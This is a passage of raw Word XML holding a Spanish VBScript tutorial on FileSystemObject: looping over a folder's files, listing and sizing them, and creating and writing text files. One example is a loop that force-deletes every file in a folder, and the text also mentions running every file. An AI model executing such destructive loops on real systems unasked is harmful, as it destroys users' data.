          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> estructura de todos los archivos de la carpeta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: una colección. ¿Lo vais entendiendo ya? Pongo una imagen:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="658"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4657090" cy="2429510"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5751" name="Picture 5751"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="5751" name="Picture 5751"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4657090" cy="242951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estructura creo que queda clara. Pero si esto es verdad, como le decimos al script cual de las X estructuras queremos </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.Name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: Para eso esta ese </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> raro:</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For Each </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>car1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> in sc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="270"/>
        <w:ind w:left="93" w:right="2844"/>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ListaArchivos = ListaArchivos&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>car1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.name&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>chr(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>13) Next</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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> significa literalmente: Por </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cada carl En sc repetir el bucle</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. En otras palabras, lo que hace es coger el primer elemento de la colección de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sc</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asignárselo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a la variable </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>carl</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, realizar las </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">funciones del bucle (en este caso añadir el nombre del archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“car1.Name”</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a una lista), y vuelve al principio del bucle. Coge el segundo elemento, se lo asigna a car1, y repite otra vez el bucle. Luego hace lo mismo con el tercero, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y así sucesivamente </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">hasta que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se terminen todos los elementos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la colección. De esa forma, con la función que os he puesto antes listamos los archivos de una carpeta. Pero no solo se puede hacer eso. Podemos,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borrar todos los archivos así:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5348"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708"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="53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car = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>fso.GetFolder</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("c:\carpeta")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="324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sc = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>car.</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">For Each </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 xml:space="preserve"> in sc</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="23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 xml:space="preserve">.DeleteFile </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">"c:\carpeta\" &amp; </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>carl</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>.name</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">, True </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Next</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O obtener el tamaño total sumando los de cada archive con la función </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>carl.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Size</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, o ejecutar todos los archivos con la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, etc. Ya cuando enseñe a trabajar con carpetas, deberás asegurarte antes de eso que la carpeta en cuestión existe, etc. Fíjate, que con cuatro o cinco funciones que he enseñado, y todo lo que tú sabías se te han multiplicado exponencialmente las posibilidades, y esto solo es el principi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ueno, pero continuemos, pues nos dejamos cosas importantes. La siguiente función necesita el objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripting.FileSystemObject</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y permite crear un archivo y escribir en él. El tipo de archivos que se pueden crear son muy variados, algunos de ellos son: Archivos de Texto, Scripts de VBScript (¡atento a esto!) y JScript, Paginas Html... Lo que con esta función escribas en un archivo, equivaldría a haber editado dicho archivo con el Bloc de Notas, poniendo en él lo que le dices a la función. En otras palabras, te permite crear archivos de texto plano (no binarios, que ya se verán mucho, mucho más adelante). La función se coloca de la siguiente forma:</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 fso.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateTextFile(</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\ArchivoPrueba.txt"</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True</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>) var.write</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">("Este es el contenido del archivo")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Donde en la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>primera linea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> colocamos el objeto. En la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>segunda linea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizando el objeto usamos la funcion </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateTextFile (</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">que lleva delante unido por un punto (.) la variable (fso) que guarda el objeto). Dentro de la función colocamos primero la ruta, que en este caso es el disco duro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seguido de \ y el nombre del archivo, un punto y su extensión. El texto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gnifica que crea el </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>archivo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> aunque exista, aunque también se puede poner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que hará que si ya existe no sobrescriba. Todo esto esta unido a una variable mediante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esto guarda </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el la estructura</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del archivo en blanco que acabamos de crear (igual que las anteriores estructuras, de las que también se pueden usar sus funciones) para que pueda ser </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>editado posteriormente usando esta variable</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</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Si no sabes como colocar la ruta solo ves a la carpeta por el explorador y mira la barra de dirección, y procede como se explicó anteriormente (no volveré a repetirlo):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1978"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2980690" cy="1951990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5917" name="Picture 5917"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="5917" name="Picture 5917"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2980690" cy="1951990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tercera linea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> usamos la variabl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seguido de un punto y la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que dentro de ella lleva lo que queramos escribir en el archivo. Aquí se pueden usar las </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">constantes de VBScript (menos la </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Chr(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">13)) y el uso de la concatenación (&amp;), al igual que las usamos en las variables de cadena, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>para escribir en el archivo:</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 fso.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateTextFile(</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\ArchivoPrueba.txt"</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True</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variable = InputBox("Escribe","Escribe","Escribe") </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>var.write</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">("Este es el contenido del InputBox: "&amp;variabl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La </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
